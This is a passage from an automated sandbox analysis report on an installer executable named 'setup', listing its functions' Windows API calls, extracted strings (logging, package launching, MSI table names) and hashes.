                                                                                                                                                                              • Instruction ID: d4790d402d262596e705b3f3dd38e3d5355fcfa4a64cd8b60f86120450bd510f
                                                                                                                                                                              • Opcode Fuzzy Hash: 72c7cc3b463acab64f6c655f49d952de8263d78ef4701af80134809f56d03b0a
                                                                                                                                                                              • Instruction Fuzzy Hash: 6273C960E49385ADD700DB759D1A39A7AA15BAB704F10A38CF2813F6E1DFF426C8C791
                                                                                                                                                                              Function 00BA5C82 Relevance: 308.7, Strings: 246, Instructions: 1248COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: -$ -$ 6$ 7$ >$ ?$ @$(3$(4$(;$(<$(F$(G$00$01$08$09$0:$0C$0D$100$100$100$10000$10000$10000$100000$100000$12000$12000$12000$12000$12000$1500$1500$1500$15000$15000$15000$15000$15000$1500000$1500000$1800$1800$1800$2000$2000$2000$2000$2000$2000$2000$2000$20000$20000$200000$200000$3000$3000$3000$3000$3000$30000$30000$30000$3000000$3000000$500$500$5000$5000$6000$6000$8-$8.$8000$8000$8000$86$87$8@$8A$@2$@3$@4$@<$@=$@>$@E$@F$@G$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_Game$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppId$BindImage$Complus$Complus$Component_$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature$Feature_$Font$Font$H/$H0$H1$H:$H;$HB$HC$HD$IniFile$IniFile$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$Location$MIME$MIME$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Options$Options$P-$P.$P7$P8$P@$PA$Patch$Patch$PatchSize$ProgId$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$SelfReg$SelfReg$SelfRegModules$ServiceControl$ServiceInstall$Shortcut$StartServices$TypeLib$TypeLib$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$X4$X5$X<$X=$X>$XF$XG$`1$`2$`9$`:$`;$`D$`E$h.$h/$h7$h8$hA$hB$p,$p3$p4$p5$p=$p>$p?$pF$x1$x2$x;$x<$xC$xD$xE$~$,$-$.$0$1$7$8$:$;$?$@$A$B$C$D
                                                                                                                                                                              • API String ID: 0-1632631402
                                                                                                                                                                              • Opcode ID: ad9b375fac30aec156e19b1d894d5726f842ccc441caba2287998552953bc2ac
                                                                                                                                                                              • Instruction ID: a360e1f05d9f165dda126b9dc7d1849c53310afd3e20a4daed96bac3dd34e708
                                                                                                                                                                              • Opcode Fuzzy Hash: ad9b375fac30aec156e19b1d894d5726f842ccc441caba2287998552953bc2ac
                                                                                                                                                                              • Instruction Fuzzy Hash: 90C26350E49384A9CB05A7B84D1B79D5DA14BE7710F14A2ECB2D13F7E2CEB02F4593A2
                                                                                                                                                                              Function 00D00370 Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 517fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00EA16D0,C0000000,00000003,00000000,00000004,00000080,00000000,02141699,00EA16AC,00EA16C4), ref: 00D003F0
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D0040D
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 00D00486
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 00D0058A
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D005FB
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,008651D8,00000026,00000000,00000000), ref: 00D0062B
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,00E1A104,00000002), ref: 00D006D6
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D006DF
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D00630
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 00D007D3
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00D00859
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D00864
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000FF,?,00000000,00000000,00E1A104,00000002,?,?,CPU: ,00000005), ref: 00D008D8
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D008E1
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,00E1A104,00000002), ref: 00D00966
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D0096F
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$BuffersFlushWrite$DebugOutputString$Init_thread_footer$CreateErrorFindHeapLastPointerProcessResource
                                                                                                                                                                              • String ID: CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
                                                                                                                                                                              • API String ID: 4051163352-1312762833
                                                                                                                                                                              • Opcode ID: 42588b642cf699d2cbfaa43d4353b512488b1c2c3232232174de0d326c46651f
                                                                                                                                                                              • Instruction ID: fa42237d6b1117831401cd8b4391a30c71d3d6ae5b3b3f74dd56ff20cb75e9d3
                                                                                                                                                                              • Opcode Fuzzy Hash: 42588b642cf699d2cbfaa43d4353b512488b1c2c3232232174de0d326c46651f
                                                                                                                                                                              • Instruction Fuzzy Hash: D6127E70A01205EFEB10DF68CC49BAEBBB4EF45314F188298E815AB2D2DB75DD44CB61
                                                                                                                                                                              Function 00BDCBB0 Relevance: 37.8, APIs: 13, Strings: 8, Instructions: 1086stringthreadsleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E1BD76), ref: 00BDCFA1
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E1BD76), ref: 00BDD131
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BDD321
                                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?, ?(-|/)+q,00E1BD76), ref: 00BDD6C1
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD744
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD74B
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD752
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD768
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BDD95E
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA6F
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA76
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA7D
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA84
                                                                                                                                                                                • Part of subcall function 00BC2290: FindClose.KERNEL32(00000000,?,?,?), ref: 00BC23CF
                                                                                                                                                                                • Part of subcall function 00BC2290: PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BC2487
                                                                                                                                                                                • Part of subcall function 00CCEF90: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,02141699,?,00000000), ref: 00CCEFDB
                                                                                                                                                                                • Part of subcall function 00CCEF90: GetLastError.KERNEL32(?,00000000), ref: 00CCEFE5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$CurrentInit_thread_footerThreadlstrcmpi$CloseErrorFindFormatHeapLastMessagePathProcessSleep
                                                                                                                                                                              • String ID: ?(-|/)+q$($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
                                                                                                                                                                              • API String ID: 2370152566-3482523422
                                                                                                                                                                              • Opcode ID: 78d299a8dc52f23c2ab10df60e44a15328a082a7b2f2deb6fa27874e536c57b2
                                                                                                                                                                              • Instruction ID: 9d60eb3735c31b945a7c4a545f3dc945f78f0d3dd54dabda891f362b93ecdf8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 78d299a8dc52f23c2ab10df60e44a15328a082a7b2f2deb6fa27874e536c57b2
                                                                                                                                                                              • Instruction Fuzzy Hash: B5A2BE70D002198FDB24DF68CC45BADFBB1EF45314F1482DAE459AB291EB70AE85CB91
                                                                                                                                                                              Function 00BCCE41 Relevance: 26.1, APIs: 3, Strings: 11, Instructions: 1626COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BCD479
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BCD897
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BCDA2C
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeString$HeapInit_thread_footer$AllocateFindProcessResource
                                                                                                                                                                              • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                                                                                                                                              • API String ID: 2507001652-3153392536
                                                                                                                                                                              • Opcode ID: 1766b4db2b72a0701fe25efef3a93c32bb673ce6a754695cae289238e50350c0
                                                                                                                                                                              • Instruction ID: e6e348a7aaee7c546158f9ba4b6c0222b38e54bc98504a6d4dbe16c4cf42d6c0
                                                                                                                                                                              • Opcode Fuzzy Hash: 1766b4db2b72a0701fe25efef3a93c32bb673ce6a754695cae289238e50350c0
                                                                                                                                                                              • Instruction Fuzzy Hash: 28E2A175D00248DFDB14DFA8C884B9EBBF4FF49314F2482ADE415A7291EB74AA85CB50
                                                                                                                                                                              Function 00BC0500 Relevance: 26.1, APIs: 17, Instructions: 611COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC0538
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00BC05B3
                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00BC05D2
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BC05E0
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00BC05F7
                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00BC0618
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00BC062F
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC06E8
                                                                                                                                                                              • ShowWindow.USER32(?,?), ref: 00BC076D
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00BC079C
                                                                                                                                                                              • ShowWindow.USER32(?,?), ref: 00BC07B9
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC07DE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$LongRectShow$Client$AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2610838350-0
                                                                                                                                                                              • Opcode ID: 6d998cdb57e901e9c6f440cca6303c801657dc6ca063dd5dab495c79892ce3af
                                                                                                                                                                              • Instruction ID: 596847fe0ff5eb3050fc85c7d189de3a78c9377e40360cef7f671bf633d0f6ce
                                                                                                                                                                              • Opcode Fuzzy Hash: 6d998cdb57e901e9c6f440cca6303c801657dc6ca063dd5dab495c79892ce3af
                                                                                                                                                                              • Instruction Fuzzy Hash: 41422671A14208DFCB14DFA9D884AAEBBF5FF88304F10856EE859EB261D730A945CF51
                                                                                                                                                                              Function 00BB6670 Relevance: 24.4, APIs: 16, Instructions: 389nativememoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BB6B00: EnterCriticalSection.KERNEL32(00EA699C,02141699,00000000,?,?,?,?,?,?,00BB632E,00DAB45D,000000FF), ref: 00BB6B3D
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB681B
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB682B
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB6836
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00BB6844
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00BB6852
                                                                                                                                                                              • GetWindowTextLengthW.USER32(?), ref: 00BB6876
                                                                                                                                                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00BB68E5
                                                                                                                                                                              • SetWindowTextW.USER32(?,00E172AC), ref: 00BB68F1
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BB6926
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00BB6934
                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00BB6988
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BB6A13
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A2C
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00BB6A73
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$FreeGlobalStringText$CursorLoadNtdllProc_$AllocCriticalEnterLengthLockSectionUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2358954841-0
                                                                                                                                                                              • Opcode ID: 50b18665082e0ac9d4feea3753a01550cc079298c1750e8c0fb28eb39d19e048
                                                                                                                                                                              • Instruction ID: 216102286f4eae4a2085ab877fc3cb273e191611e8525b8403460f4dbf7dacdc
                                                                                                                                                                              • Opcode Fuzzy Hash: 50b18665082e0ac9d4feea3753a01550cc079298c1750e8c0fb28eb39d19e048
                                                                                                                                                                              • Instruction Fuzzy Hash: 47D1AE71900205AFDF10DFA5CC48BBEBBF8EF45714F1481A9E911A7290DBB99E04CBA1
                                                                                                                                                                              Function 00BC2290 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 668fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00BC23CF
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BC2487
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,00000000), ref: 00BC25DC
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 00BC25F6
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,?,00000000), ref: 00BC2629
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00BC2698
                                                                                                                                                                              • SetLastError.KERNEL32(0000007B), ref: 00BC26A6
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00BC26FC
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00BC271C
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(*.*,?,02141699), ref: 00BC28B5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$Find$CloseFullName_wcsrchr$ErrorFileFirstLast
                                                                                                                                                                              • String ID: *.*$\\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 1241272779-1700010636
                                                                                                                                                                              • Opcode ID: 7bfd1a07a62ea75355b1ff49473ba22205b10c89bc1aaa35dd21a7b47f709530
                                                                                                                                                                              • Instruction ID: 0854047079a0a02d7923ab4065b88bfc214efa0cf476de2db3e11ad34b609ecd
                                                                                                                                                                              • Opcode Fuzzy Hash: 7bfd1a07a62ea75355b1ff49473ba22205b10c89bc1aaa35dd21a7b47f709530
                                                                                                                                                                              • Instruction Fuzzy Hash: 9232F070600605DFDB14EF68C889FAAB7E5FF54314F1082ADE815DB2A1EB75AD44CBA0
                                                                                                                                                                              Function 00BB5F50 Relevance: 19.9, APIs: 13, Instructions: 416nativememoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB617B
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00BB618B
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 00BB6196
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,?), ref: 00BB61A4
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EB), ref: 00BB61B2
                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00BB61D6
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BB6245
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,00E172AC), ref: 00BB6251
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BB6286
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00BB6294
                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00BB62E8
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BB634D
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000000,00000000,02141699,00000000), ref: 00BB639F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$GlobalText$NtdllProc_$AllocLengthLockUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2673961051-0
                                                                                                                                                                              • Opcode ID: 2f3d10f463ed65157dc91c0afef29e221eeff6a2b9c13d1818193d7463029aad
